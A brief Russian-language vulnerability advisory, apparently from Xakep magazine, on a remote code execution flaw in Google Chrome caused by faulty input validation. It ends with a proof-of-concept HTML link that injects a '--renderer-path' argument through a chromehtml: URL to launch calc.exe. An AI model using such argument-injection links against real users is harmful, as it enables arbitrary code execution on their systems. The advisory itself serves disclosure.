Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Google Chrome Browser
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных.
Атакующий может обманным образом заманить пользователя на специально
составленный сайт, что приведет к выполнению произвольного кода.
Эксплоит:
<a href='http://anonymouse.org/cgi-bin/anon-www.cgi/chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click
me</a>